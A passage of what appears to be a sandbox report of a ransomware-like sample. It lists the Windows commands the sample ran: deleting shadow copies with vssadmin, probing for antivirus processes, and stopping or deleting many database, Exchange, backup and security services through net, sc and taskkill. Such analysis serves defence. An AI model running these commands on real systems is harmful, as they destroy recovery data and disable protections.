C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB3
4⤵
PID:1016

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB4
3⤵
PID:856

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB4
4⤵
PID:1764

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB5
3⤵
PID:1912

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB5
4⤵
PID:1320

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im UniFi.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1476

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq MsMpEng.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:324

C:\Windows\SysWOW64\find.exe
find /c "PID"
3⤵
PID:1188

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq ntrtscan.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1604

C:\Windows\SysWOW64\find.exe
find /c "PID"
3⤵
PID:1156

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq avp.exe"
3⤵
- Enumerates processes with tasklist
PID:108

C:\Windows\SysWOW64\find.exe
find /c "PID"
3⤵
PID:320

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq WRSA.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1504

C:\Windows\SysWOW64\find.exe
find /c "PID"
3⤵
PID:1988

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq egui.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1596

C:\Windows\SysWOW64\find.exe
find /c "PID"
3⤵
PID:1356

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq AvastUI.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1972

C:\Windows\SysWOW64\find.exe
find /c "PID"
3⤵
PID:1764

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:912

C:\Windows\SysWOW64\cmd.exe
cmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""
3⤵
PID:1612

C:\Windows\SysWOW64\sc.exe
sc delete "XT800Service_Personal"
4⤵
PID:2172

C:\Windows\SysWOW64\sc.exe
sc delete SQLSERVERAGENT
4⤵
PID:2236

C:\Windows\SysWOW64\sc.exe
sc delete SQLWriter
4⤵
- Launches sc.exe
PID:2312

C:\Windows\SysWOW64\sc.exe
sc delete SQLBrowser
4⤵
PID:2408

C:\Windows\SysWOW64\sc.exe
sc delete MSSQLFDLauncher
4⤵
PID:2552

C:\Windows\SysWOW64\sc.exe
sc delete QcSoftService
4⤵
PID:3048

C:\Windows\SysWOW64\sc.exe
sc delete MSSQLSERVER
4⤵
PID:2952

C:\Windows\SysWOW64\sc.exe
sc delete MSSQLServerOLAPService
4⤵
PID:2160

C:\Windows\SysWOW64\sc.exe
sc delete VMTools
4⤵
PID:2616

C:\Windows\SysWOW64\sc.exe
sc delete VGAuthService
4⤵
PID:2824

C:\Windows\SysWOW64\sc.exe
sc delete MSDTC
4⤵
- Launches sc.exe
PID:1188

C:\Windows\SysWOW64\sc.exe
sc delete TeamViewer
4⤵
- Launches sc.exe
PID:2284

C:\Windows\SysWOW64\sc.exe
sc delete ReportServer
4⤵
PID:2528

C:\Windows\SysWOW64\sc.exe
sc delete RabbitMQ
4⤵
PID:2992

C:\Windows\SysWOW64\sc.exe
sc delete "AHS SERVICE"
4⤵
PID:2904

C:\Windows\SysWOW64\sc.exe
sc delete "Sense Shield Service"
4⤵
PID:2560

C:\Windows\SysWOW64\sc.exe
sc delete SSMonitorService
4⤵
PID:1924

C:\Windows\SysWOW64\sc.exe
sc delete SSSyncService
4⤵
PID:2196

C:\Windows\SysWOW64\sc.exe
sc delete TPlusStdAppService1300
4⤵
- Launches sc.exe
PID:2292

C:\Windows\SysWOW64\sc.exe
sc delete MSSQL$SQL2008
4⤵
PID:3028

C:\Windows\SysWOW64\sc.exe
sc delete SQLAgent$SQL2008
4⤵
- Launches sc.exe
PID:2944

C:\Windows\SysWOW64\sc.exe
sc delete TPlusStdTaskService1300
4⤵
PID:2904

C:\Windows\SysWOW64\sc.exe
sc delete TPlusStdUpgradeService1300
4⤵
PID:2212

C:\Windows\SysWOW64\sc.exe
sc delete VirboxWebServer
4⤵
PID:1392

C:\Windows\SysWOW64\sc.exe
sc delete jhi_service
4⤵
PID:2784

C:\Windows\SysWOW64\sc.exe
sc delete LMS
4⤵
PID:2772

C:\Windows\SysWOW64\sc.exe
sc delete "FontCache3.0.0.0"
4⤵
- Launches sc.exe
PID:2860

C:\Windows\SysWOW64\sc.exe
sc delete "OSP Service"
4⤵
PID:3020

C:\Windows\SysWOW64\cmd.exe
cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services""
3⤵
PID:1868

C:\Windows\SysWOW64\sc.exe
sc delete OracleOraDb11g_home1ClrAgent
4⤵
PID:2152

C:\Windows\SysWOW64\sc.exe
sc delete OracleOraDb11g_home1TNSListener
4⤵
PID:2184

C:\Windows\SysWOW64\sc.exe
sc delete OracleVssWriterORCL
4⤵
- Launches sc.exe
PID:2228

C:\Windows\SysWOW64\sc.exe
sc delete OracleServiceORCL
4⤵
PID:2324

C:\Windows\SysWOW64\sc.exe
sc delete aspnet_state @sc delete Redis
4⤵
PID:2424

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DellDRLogSvc
5⤵
PID:2252

C:\Windows\SysWOW64\sc.exe
sc delete OracleVssWriterORCL
4⤵
- Launches sc.exe
PID:2504

C:\Windows\SysWOW64\sc.exe
sc delete JhTask
4⤵
PID:3032

C:\Windows\SysWOW64\sc.exe
sc delete ImeDictUpdateService
4⤵
PID:2152

C:\Windows\SysWOW64\sc.exe
sc delete XT800Service_Personal
4⤵
PID:2628

C:\Windows\SysWOW64\sc.exe
sc delete MCService
4⤵
PID:2844

C:\Windows\SysWOW64\sc.exe
sc delete ImeDictUpdateService
4⤵
PID:1272

C:\Windows\SysWOW64\sc.exe
sc delete allpass_redisservice_port21160
4⤵
PID:2476

C:\Windows\SysWOW64\sc.exe
sc delete "Flash Helper Service"
4⤵
- Launches sc.exe
PID:2556

C:\Windows\SysWOW64\sc.exe
sc delete "Kiwi Syslog Server"
4⤵
PID:1912

C:\Windows\SysWOW64\sc.exe
sc delete "UWS HiPriv Services"
4⤵
- Launches sc.exe
PID:2336

C:\Windows\SysWOW64\cmd.exe
cmd /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Service x64" & @net stop DellDRLogSvc & @net stop FirebirdGuardianDeafaultInstance & @net stop JWEM3DBAUTORun & @net stop JWRinfoClientService & @net stop JWService & @net stop Service2 & @net stop RapidRecoveryAgent & @net stop FirebirdServerDefaultInstance & @net stop AdobeARMservice & @net stop VeeamCatalogSvc & @net stop VeeanBackupSvc & @net stop VeeamTransportSvc & @net stop TPlusStdAppService1300 & @net stop TPlusStdTaskService1300 & @net stop TPlusStdUpgradeService1300 & @net stop TPlusStdWebService1300 & @net stop VeeamNFSSvc & @net stop VeeamDeploySvc & @net stop VeeamCloudSvc & @net stop VeeamMountSvc & @net stop VeeamBrokerSvc & @net stop VeeamDistributionSvc & @net stop tmlisten & @net stop ServiceMid & @net stop 360EntPGSvc & @net stop ClickToRunSvc & @net stop RavTask & @net stop AngelOfDeath & @net stop d_safe & @net stop NFLicenceServer & @net stop "NetVault Process Manager" & @net stop RavService & @net stop DFServ & @net stop IngressMgr & @net stop EvtSys & @net stop K3ClouManager & @net stop NFVPrintServer & @net stop RTCAVMCU & @net stop CobianBackup10 & @net stop GNWebService & @net stop Mysoft.SchedulingService & @net stop AgentX & @net stop SentinelKeysServer & @net stop DGPNPSEV & @net stop TurboCRM70 & @net stop NFSysService & @net stop U8DispatchService & @net stop NFOTPService & @net stop U8EISService & @net stop U8EncryptService & @net stop U8GCService & @net stop U8KeyManagePool & @net stop U8MPool & @net stop U8SCMPool & @net stop U8SLReportService & @net stop U8TaskService & @net stop U8WebPool & @net stop UFAllNet & @net stop UFReportService & @net stop UTUService"
3⤵
PID:816

C:\Windows\SysWOW64\net.exe
net stop HaoZipSvc
4⤵
PID:2248

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop HaoZipSvc
5⤵
PID:2348

C:\Windows\SysWOW64\net.exe
net stop "igfxCUIService2.0.0.0"
4⤵
PID:2512

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "igfxCUIService2.0.0.0"
5⤵
PID:2536

C:\Windows\SysWOW64\net.exe
net stop Realtek11nSU
4⤵
PID:3040

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Realtek11nSU
5⤵
PID:2132

C:\Windows\SysWOW64\net.exe
net stop xenlite
4⤵
PID:2300

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop xenlite
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2520

C:\Windows\SysWOW64\net.exe
net stop XenSvc
4⤵
PID:2860

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop XenSvc
5⤵
PID:2920

C:\Windows\SysWOW64\net.exe
net stop Apache2.2
4⤵
PID:2172

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Apache2.2
5⤵
PID:2336

C:\Windows\SysWOW64\net.exe
net stop "Synology Drive VSS Service x64"
4⤵
PID:2360

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Synology Drive VSS Service x64"
5⤵
PID:2808

C:\Windows\SysWOW64\net.exe
net stop FirebirdGuardianDeafaultInstance
4⤵
PID:2332

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FirebirdGuardianDeafaultInstance
5⤵
PID:2592

C:\Windows\SysWOW64\net.exe
net stop DellDRLogSvc
4⤵
PID:2424

C:\Windows\SysWOW64\net.exe
net stop JWEM3DBAUTORun
4⤵
PID:2648

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop JWEM3DBAUTORun
5⤵
PID:2616

C:\Windows\SysWOW64\net.exe
net stop JWRinfoClientService
4⤵
PID:2420

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop JWRinfoClientService
5⤵
PID:3040

C:\Windows\SysWOW64\net.exe
net stop JWService
4⤵
PID:2424

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop JWService
5⤵
PID:2232

C:\Windows\SysWOW64\net.exe
net stop Service2
4⤵
PID:2964

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Service2
5⤵
PID:2856

C:\Windows\SysWOW64\net.exe
net stop RapidRecoveryAgent
4⤵
PID:2268

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RapidRecoveryAgent
5⤵
PID:1016

C:\Windows\SysWOW64\net.exe
net stop FirebirdServerDefaultInstance
4⤵
PID:2624

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FirebirdServerDefaultInstance
5⤵
PID:2732

C:\Windows\SysWOW64\net.exe
net stop AdobeARMservice
4⤵
PID:3044

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AdobeARMservice
5⤵
PID:228

C:\Windows\SysWOW64\net.exe
net stop VeeamCatalogSvc
4⤵
PID:2436

C:\Windows\SysWOW64\net.exe
net stop VeeanBackupSvc
4⤵
PID:2828

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeanBackupSvc
5⤵
PID:2736

C:\Windows\SysWOW64\net.exe
net stop VeeamTransportSvc
4⤵
PID:2148

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc
5⤵
PID:2284

C:\Windows\SysWOW64\net.exe
net stop TPlusStdAppService1300
4⤵
PID:2460

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TPlusStdAppService1300
5⤵
PID:1652

C:\Windows\SysWOW64\net.exe
net stop TPlusStdTaskService1300
4⤵
PID:3024

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TPlusStdTaskService1300
5⤵
PID:2144

C:\Windows\SysWOW64\net.exe
net stop TPlusStdUpgradeService1300
4⤵
PID:2736

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TPlusStdUpgradeService1300
5⤵
PID:1016

C:\Windows\SysWOW64\net.exe
net stop TPlusStdWebService1300
4⤵
PID:2376

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TPlusStdWebService1300
5⤵
PID:2260

C:\Windows\SysWOW64\net.exe
net stop VeeamNFSSvc
4⤵
PID:3004

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc
5⤵
PID:2484

C:\Windows\SysWOW64\net.exe
net stop VeeamDeploySvc
4⤵
PID:2508

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc
5⤵
PID:2596

C:\Windows\SysWOW64\net.exe
net stop VeeamCloudSvc
4⤵
PID:2228

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc
5⤵
PID:2116

C:\Windows\SysWOW64\cmd.exe
cmd /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer & @net stop mysqltransport & @net stop VMnetDHCP & @net stop "VMware NAT Service" & @net stop Tomcat8 & @net stop TeamViewer & @net stop QPCore & @net stop CASLicenceServer & @net stop CASWebServer & @net stop AutoUpdateService & @net stop "Alibaba Security Aegis Detect Service" & @net stop "Alibaba Security Aegis Update Service" & @net stop "AliyunService" & @net stop CASXMLService & @net stop AGSService & @net stop RapService & @net stop DDNSService & @net stop iNethinkSQLBackupSvc & @net stop CASVirtualDiskService & @net stop CASMsgSrv & @net stop "OracleOraDb10g_homeliSQL*Plus" & @net stop OracleDBConsoleilas & @net stop MySQL & @net stop TPlusStdAppService1220 & @net stop TPlusStdTaskService1220 & @net stop TPlusStdUpgradeService1220 & @net stop K3MobileServiceManage & @net stop "FileZilla Server" & @net stop DDVRulesProcessor & @net stop ImtsEventSvr & @net stop AutoUpdatePatchService & @net stop OMAILREPORT & @net stop "Dell Hardware Support" & @net stop SupportAssistAgent & @net stop K3MMainSuspendService & @net stop KpService & @net stop ceng_web_svc_d & @net stop KugouService & @net stop pcas & @net stop U8SendMailAdmin & @net stop "Bonjour Service" & @net stop "Apple Mobile Device Service" & @net stop "ABBYY.Licensing.FineReader.Professional.12.0""
3⤵
PID:436

C:\Windows\SysWOW64\net.exe
net stop UIODetect
4⤵
PID:2284

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop UIODetect
5⤵
PID:2332

C:\Windows\SysWOW64\net.exe
net stop VMwareHostd
4⤵
PID:2492

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VMwareHostd
5⤵
PID:2528

C:\Windows\SysWOW64\net.exe
net stop TeamViewer8
4⤵
- Discovers systems in the same network
PID:2940

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TeamViewer8
5⤵
PID:3012

C:\Windows\SysWOW64\net.exe
net stop VMUSBArbService
4⤵
PID:2148

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VMUSBArbService
5⤵
PID:2324

C:\Windows\SysWOW64\net.exe
net stop VMAuthdService
4⤵
PID:2888

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VMAuthdService
5⤵
PID:2948

C:\Windows\SysWOW64\net.exe
net stop wanxiao-monitor
4⤵
PID:2908

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wanxiao-monitor
5⤵
PID:2912

C:\Windows\SysWOW64\net.exe
net stop WebAttendServer
4⤵
PID:2268

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WebAttendServer
5⤵
PID:2176

C:\Windows\SysWOW64\net.exe
net stop mysqltransport
4⤵
PID:2612

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mysqltransport
5⤵
PID:2468

C:\Windows\SysWOW64\net.exe
net stop VMnetDHCP
4⤵
PID:2324

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VMnetDHCP
5⤵
PID:2576

C:\Windows\SysWOW64\net.exe
net stop "VMware NAT Service"
4⤵
PID:2976

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "VMware NAT Service"
5⤵
PID:2128

C:\Windows\SysWOW64\net.exe
net stop Tomcat8
4⤵
PID:2164

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Tomcat8
5⤵
PID:2728

C:\Windows\SysWOW64\net.exe
net stop TeamViewer
4⤵
- Discovers systems in the same network
PID:3004

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TeamViewer
5⤵
PID:2484

C:\Windows\SysWOW64\net.exe
net stop QPCore
4⤵
PID:2160

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QPCore
5⤵
PID:2988

C:\Windows\SysWOW64\net.exe
net stop CASLicenceServer
4⤵
PID:2400

C:\Windows\SysWOW64\net.exe
net stop CASWebServer
4⤵
PID:2256

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASWebServer
5⤵
PID:2232

C:\Windows\SysWOW64\net.exe
net stop AutoUpdateService
4⤵
PID:2900

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AutoUpdateService
5⤵
PID:2912

C:\Windows\SysWOW64\net.exe
net stop "Alibaba Security Aegis Detect Service"
4⤵
PID:2224

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Alibaba Security Aegis Detect Service"
5⤵
PID:1940

C:\Windows\SysWOW64\net.exe
net stop "Alibaba Security Aegis Update Service"
4⤵
PID:2440

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Alibaba Security Aegis Update Service"
5⤵
PID:2304

C:\Windows\SysWOW64\net.exe
net stop "AliyunService"
4⤵
PID:2812

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "AliyunService"
5⤵
PID:2904

C:\Windows\SysWOW64\net.exe
net stop CASXMLService
4⤵
PID:1544

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASXMLService
5⤵
PID:2112

C:\Windows\SysWOW64\net.exe
net stop AGSService
4⤵
PID:2708

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AGSService
5⤵
PID:3008

C:\Windows\SysWOW64\net.exe
net stop RapService
4⤵
PID:2288

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RapService
5⤵
PID:2948

C:\Windows\SysWOW64\net.exe
net stop DDNSService
4⤵
PID:2328

C:\Windows\SysWOW64\net.exe
net stop iNethinkSQLBackupSvc
4⤵
PID:2364

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop iNethinkSQLBackupSvc
5⤵
PID:2432

C:\Windows\SysWOW64\net.exe
net stop CASVirtualDiskService
4⤵
PID:2184

C:\Windows\SysWOW64\cmd.exe
cmd /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop MSExchangeADTopology & @net stop MSExchangeAntispamUpdate & @net stop MSExchangeCompliance & @net stop MSExchangeDagMgmt & @net stop MSExchangeDelivery & @net stop MSExchangeDiagnostics & @net stop MSExchangeEdgeSync & @net stop MSExchangeFastSearch & @net stop MSExchangeFrontEndTransport & @net stop MSExchangeHM & @net stop MSSQL$SQL2008 & @net stop MSExchangeHMRecovery & @net stop MSExchangeImap4 & @net stop MSExchangeIMAP4BE & @net stop MSExchangeIS & @net stop MSExchangeMailboxAssistants & @net stop MSExchangeMailboxReplication & @net stop MSExchangeNotificationsBroker & @net stop MSExchangePop3 & @net stop MSExchangePOP3BE & @net stop MSExchangeRepl & @net stop MSExchangeRPC & @net stop MSExchangeServiceHost & @net stop MSExchangeSubmission & @net stop MSExchangeThrottling & @net stop MSExchangeTransport & @net stop MSExchangeTransportLogSearch & @net stop MSExchangeUM & @net stop MSExchangeUMCR & @net stop MySQL5_OA"
3⤵
PID:560

C:\Windows\SysWOW64\net.exe
net stop U8WorkerService1
4⤵
PID:2272

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop U8WorkerService1
5⤵
PID:2304

C:\Windows\SysWOW64\net.exe
net stop U8WorkerService2
4⤵
PID:2416

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop U8WorkerService2
5⤵
PID:2484

C:\Windows\SysWOW64\net.exe
net stop Apache2.4
4⤵
PID:3024

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Apache2.4
5⤵
PID:644

C:\Windows\SysWOW64\net.exe
net stop "memcached Server"
4⤵
PID:2976

C:\Windows\SysWOW64\net.exe
net stop UFIDAWebService
4⤵
PID:2320

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop UFIDAWebService
5⤵
PID:2288

C:\Windows\SysWOW64\net.exe
net stop MSComplianceAudit
4⤵
PID:2788

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSComplianceAudit
5⤵
PID:2416

C:\Windows\SysWOW64\net.exe
net stop MSExchangeADTopology
4⤵
PID:2164

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeADTopology
5⤵
PID:2892

C:\Windows\SysWOW64\net.exe
net stop MSExchangeAntispamUpdate
4⤵
PID:2400

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeAntispamUpdate
5⤵
PID:2796

C:\Windows\SysWOW64\net.exe
net stop MSExchangeCompliance
4⤵
PID:2736

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeCompliance
5⤵
PID:2620

C:\Windows\SysWOW64\net.exe
net stop MSExchangeDagMgmt
4⤵
PID:2432

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeDagMgmt
5⤵
PID:2784

C:\Windows\SysWOW64\net.exe
net stop MSExchangeDelivery
4⤵
PID:3064

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeDelivery
5⤵
PID:2200

C:\Windows\SysWOW64\net.exe
net stop MSExchangeDiagnostics
4⤵
PID:2360

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeDiagnostics
5⤵
PID:2752

C:\Windows\SysWOW64\net.exe
net stop MSExchangeEdgeSync
4⤵
PID:2432

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeEdgeSync
5⤵
PID:2536

C:\Windows\SysWOW64\net.exe
net stop MSExchangeFastSearch
4⤵
PID:2116

C:\Windows\SysWOW64\net.exe
net stop MSExchangeFrontEndTransport
4⤵
PID:2372

C:\Windows\SysWOW64\net.exe
net stop MSExchangeHM
4⤵
PID:2388

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeHM
5⤵
PID:2296

C:\Windows\SysWOW64\net.exe
net stop MSSQL$SQL2008
4⤵
PID:2792

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL2008
5⤵
PID:2432

C:\Windows\SysWOW64\net.exe
net stop MSExchangeHMRecovery
4⤵
PID:2372

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeHMRecovery
5⤵
PID:2212

C:\Windows\SysWOW64\net.exe
net stop MSExchangeImap4
4⤵
PID:2352

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeImap4
5⤵
PID:2788

C:\Windows\SysWOW64\net.exe
net stop MSExchangeIMAP4BE
4⤵
PID:2744

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIMAP4BE
5⤵
PID:2376

C:\Windows\SysWOW64\net.exe
net stop MSExchangeIS
4⤵
PID:2936

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS
5⤵
PID:2196

C:\Windows\SysWOW64\net.exe
net stop MSExchangeMailboxAssistants
4⤵
PID:2508

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMailboxAssistants
5⤵
PID:2392

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeRepl
6⤵
PID:2212

C:\Windows\SysWOW64\net.exe
net stop MSExchangeMailboxReplication
4⤵
PID:2468

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMailboxReplication
5⤵
PID:2240

C:\Windows\SysWOW64\net.exe
net stop MSExchangeNotificationsBroker
4⤵
PID:1868

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeNotificationsBroker
5⤵
PID:2428

C:\Windows\SysWOW64\net.exe
net stop MSExchangePop3
4⤵
PID:2332

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangePop3
5⤵
PID:2624

C:\Windows\SysWOW64\net.exe
net stop MSExchangePOP3BE
4⤵
PID:2852

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangePOP3BE
5⤵
PID:2408

C:\Windows\SysWOW64\net.exe
net stop MSExchangeRepl
4⤵
PID:2392

C:\Windows\SysWOW64\net.exe
net stop MSExchangeRPC
4⤵
PID:2792

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeRPC
5⤵
PID:2252

C:\Windows\SysWOW64\net.exe
net stop MSExchangeServiceHost
4⤵
PID:2972

C:\Windows\SysWOW64\cmd.exe
cmd /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM reportingservicesservice.exe /F & @taskkill /IM softmgrlite.exe /F & @taskkill /IM sqlbrowser.exe /F & @taskkill /IM ssms.exe /F & @taskkill /IM vmtoolsd.exe /F & @taskkill /IM baidunetdisk.exe /F & @taskkill /IM yundetectservice.exe /F & @taskkill /IM ssclient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM RAVCp164.exe /F & @taskkill /IM igfxEM.exe /F & @taskkill /IM igfxHK.exe /F & @taskkill /IM igfxTray.exe /F & @taskkill /IM 360bdoctor.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM PrivacyIconClient.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM GoogleCrashHandler.exe /F & @taskkill /IM GoogleCrashHandler64.exe /F & @taskkill /IM GoogleUpdate.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM "FileZilla server.exe" /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM Admin.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM tomcat7.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F & @taskkill /IM 